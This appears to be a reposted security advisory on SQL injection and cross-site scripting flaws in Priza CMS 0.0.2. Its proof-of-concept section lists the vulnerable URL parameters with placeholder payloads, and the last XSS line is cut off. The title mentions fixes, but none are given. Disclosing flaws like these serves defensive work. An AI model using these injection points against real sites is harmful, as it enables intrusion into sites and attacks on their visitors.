Priza CMS多个缺陷及修复 -电脑资料

    标题: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability

    作者: BHG Security Center

    软件地址: http://www.priza.co.il/

    影响版本: [0.0.2]

    测试平台: ubuntu 11.04

    发现者：

    - Net.Edit0r (Net.edit0r [at] att [dot] net)

    - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)

    -----------------------------------------------------------------------------------------

    Priza Israel Cms SQL Injection / XSS Multiple Vulnerability

    -----------------------------------------------------------------------------------------

    Author : BHG Security Center

    ---------------------------------------------------------------------------

    PoC/Exploit:

    ~~~~~~~~~~

    ~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi]

    ~ [PoC] ~: /website_path/index.asp?page_id=[SQLi]

    ~ [PoC] ~: /website_path/volumes.asp?id=18

    ~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss]

    ~~~~~~~~ 测试

    ~ [PoC] ~: Http:// /path/index.asp?p_id=201&id=[SQLi]

    ~ [PoC] ~: Http:// /path/index.asp?action=find&page_id=28&string=">

    -------------------------------- [ EOF ] ----------------------------------